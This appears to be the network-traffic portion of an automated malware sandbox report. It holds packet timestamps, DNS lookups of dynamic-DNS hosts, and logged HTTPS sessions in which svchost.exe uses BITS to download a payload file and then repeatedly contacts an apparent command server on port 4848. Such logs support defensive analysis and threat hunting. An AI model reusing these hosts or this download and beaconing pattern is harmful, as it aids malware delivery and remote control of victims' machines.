                                                        Mar 18, 2024 08:08:39.478087902 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.478097916 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.523047924 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.716422081 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.716471910 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.716492891 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.716542006 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.716562033 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.716588020 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.716595888 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.716600895 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.716626883 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.716680050 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.793576956 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.793760061 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.838865042 CET484849754180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:39.951575041 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.951659918 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.952280998 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.952361107 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.952991009 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.953061104 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.955786943 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.955869913 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.956768990 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.956875086 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:39.984468937 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:39.984570980 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.026273012 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.026355028 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.181705952 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.181849957 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.185081959 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.185172081 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.185175896 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.185189962 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.185250998 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.185439110 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.185511112 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.185782909 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.185843945 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.185935020 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.185998917 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.186925888 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.186997890 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.187696934 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.187767982 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.190027952 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.190098047 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.190627098 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.190691948 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.215540886 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.215671062 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.216156960 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.216242075 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.258541107 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.258708000 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.259295940 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.259396076 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.351193905 CET497544848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:40.415136099 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.415260077 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.415416956 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.415487051 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.415833950 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.415906906 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.416579962 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.416678905 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.425463915 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.425559044 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.425941944 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.426136971 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.426559925 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.426639080 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.426951885 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.427031040 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.427619934 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.427690983 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.428071022 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.428141117 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.428554058 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.428639889 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.428961039 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.429033995 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.429533005 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.429615021 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.430257082 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.430325031 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.431446075 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.431521893 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.432115078 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.432183981 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.433239937 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.433324099 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.433888912 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.433959961 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.434335947 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.434412003 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.434834957 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.434906960 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.448703051 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.448810101 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.450753927 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.450834036 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.451282024 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.451355934 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.451633930 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.451702118 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.489774942 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.489856958 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.491235971 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.491311073 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.491730928 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.491811991 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492382050 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.492449999 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492456913 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.492496967 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492536068 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.492548943 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492583990 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.492584944 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492598057 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.721699953 CET484849754180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:41.226499081 CET497544848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:41.589442015 CET484849754180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:42.101289034 CET497544848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:42.464353085 CET484849754180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:43.574389935 CET497554848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:43.923412085 CET484849755180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:44.429332018 CET497554848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:44.778090000 CET484849755180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:45.288659096 CET497554848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:45.639667034 CET484849755180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:46.148067951 CET497554848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:46.496987104 CET484849755180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:47.007378101 CET497554848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:47.357847929 CET484849755180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:48.460851908 CET497574848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:48.823472977 CET484849757180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:49.335643053 CET497574848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:49.698319912 CET484849757180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:50.210683107 CET497574848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:50.573957920 CET484849757180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:51.085653067 CET497574848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:51.448465109 CET484849757180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:51.960504055 CET497574848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:52.325965881 CET484849757180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:53.442853928 CET497584848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:53.804136992 CET484849758180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:54.304390907 CET497584848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:54.668191910 CET484849758180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:55.179379940 CET497584848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:55.540163994 CET484849758180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:56.054239035 CET497584848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:56.415633917 CET484849758180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:56.929310083 CET497584848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:57.291239977 CET484849758180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:58.399091005 CET497594848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:58.764106989 CET484849759180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:08:59.273061991 CET497594848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:08:59.634849072 CET484849759180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:00.147994041 CET497594848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:00.509798050 CET484849759180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:01.023078918 CET497594848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:01.397298098 CET484849759180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:01.898011923 CET497594848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:02.261970043 CET484849759180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:03.369544029 CET497604848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:03.731647015 CET484849760180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:04.241945028 CET497604848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:04.603888988 CET484849760180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:05.116758108 CET497604848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:05.478888988 CET484849760180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:05.991812944 CET497604848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:06.357175112 CET484849760180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:06.866869926 CET497604848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:07.231039047 CET484849760180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:08.338151932 CET497624848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:08.700169086 CET484849762180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:09.210500956 CET497624848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:09.574580908 CET484849762180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:09.610544920 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:09.610631943 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:09.610714912 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:09.621578932 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:09.621612072 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.100593090 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.100784063 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.105993986 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.106005907 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.106343985 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.106414080 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.108577967 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.152276039 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.163621902 CET497624848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:10.526658058 CET484849762180.214.236.46192.168.2.5
                                                        Mar 18, 2024 08:09:10.579428911 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.579523087 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.579535961 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.579564095 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.579598904 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.579638004 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.579643965 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.579729080 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.811836958 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.811849117 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.811994076 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.812438965 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.812599897 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.812783957 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.812858105 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:10.884490013 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:10.884618998 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.044285059 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.044374943 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.045162916 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.045228958 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.045584917 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.045648098 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.045973063 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.046040058 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.046840906 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.046926975 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.068882942 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.068964958 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.117068052 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.117171049 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.163661003 CET497624848192.168.2.5180.214.236.46
                                                        Mar 18, 2024 08:09:11.281110048 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.281286955 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.281568050 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.281656027 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.282371044 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.282449007 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.282666922 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.282742023 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.283246994 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.283314943 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.283634901 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.283703089 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.283915997 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.283984900 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.284272909 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.284334898 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.284554005 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.284617901 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.284854889 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.284919977 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.285192013 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.285249949 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.300848961 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.300923109 CET44349763195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:09:11.300978899 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.301131964 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.301131964 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.301163912 CET49763443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:09:11.525964975 CET484849762180.214.236.46192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 18, 2024 08:07:32.377424002 CET5771353192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:07:32.936949968 CET53577131.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:12.325293064 CET6109053192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:12.853003979 CET53610901.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:17.038511038 CET6097553192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:17.130248070 CET53609751.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:17.135411024 CET6202253192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:17.238898993 CET53620221.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:27.902820110 CET5457653192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:27.993170977 CET53545761.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:33.229437113 CET5397653192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:33.319610119 CET53539761.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:38.513396025 CET6288653192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:38.605495930 CET53628861.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:43.477565050 CET5686153192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:43.572391033 CET53568611.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:48.368124962 CET5619753192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:48.458528042 CET53561971.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:53.337568998 CET5480853192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:53.441003084 CET53548081.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:08:58.305768967 CET5806053192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:08:58.396466970 CET53580601.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:09:03.274326086 CET5697953192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:09:03.365971088 CET53569791.1.1.1192.168.2.5
                                                        Mar 18, 2024 08:09:08.243176937 CET5101453192.168.2.51.1.1.1
                                                        Mar 18, 2024 08:09:08.334475994 CET53510141.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 18, 2024 08:07:32.377424002 CET192.168.2.51.1.1.10xabc6Standard query (0)brustiaalfa.websin.itA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:12.325293064 CET192.168.2.51.1.1.10xe959Standard query (0)maso.geA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:17.038511038 CET192.168.2.51.1.1.10x1e28Standard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:17.135411024 CET192.168.2.51.1.1.10x77e8Standard query (0)rnnfibiteammony.duckdns.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:27.902820110 CET192.168.2.51.1.1.10x5d65Standard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:33.229437113 CET192.168.2.51.1.1.10x9f01Standard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:38.513396025 CET192.168.2.51.1.1.10x40aaStandard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:43.477565050 CET192.168.2.51.1.1.10xed6eStandard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:48.368124962 CET192.168.2.51.1.1.10x6a43Standard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:53.337568998 CET192.168.2.51.1.1.10xb8beStandard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:58.305768967 CET192.168.2.51.1.1.10xb650Standard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:09:03.274326086 CET192.168.2.51.1.1.10xff07Standard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:09:08.243176937 CET192.168.2.51.1.1.10x22faStandard query (0)tolatilbu.hopto.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 18, 2024 08:07:32.936949968 CET1.1.1.1192.168.2.50xabc6No error (0)brustiaalfa.websin.it89.40.227.248A (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:12.853003979 CET1.1.1.1192.168.2.50xe959No error (0)maso.ge195.54.178.4A (IP address)IN (0x0001)false
                                                        Mar 18, 2024 08:08:17.238898993 CET1.1.1.1192.168.2.50x77e8No error (0)rnnfibiteammony.duckdns.org180.214.236.46A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • brustiaalfa.websin.it
                                                        • maso.ge

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.54973289.40.227.2484434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:07:33 UTC166OUTHEAD /Produktionshallens.thn HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: brustiaalfa.websin.it
                                                        2024-03-18 07:07:33 UTC209INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:07:28 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 483156


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.54973389.40.227.2484434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:07:34 UTC217OUTGET /Produktionshallens.thn HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Mon, 18 Mar 2024 01:27:54 GMT
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: brustiaalfa.websin.it
                                                        2024-03-18 07:07:34 UTC209INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:07:29 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 483156
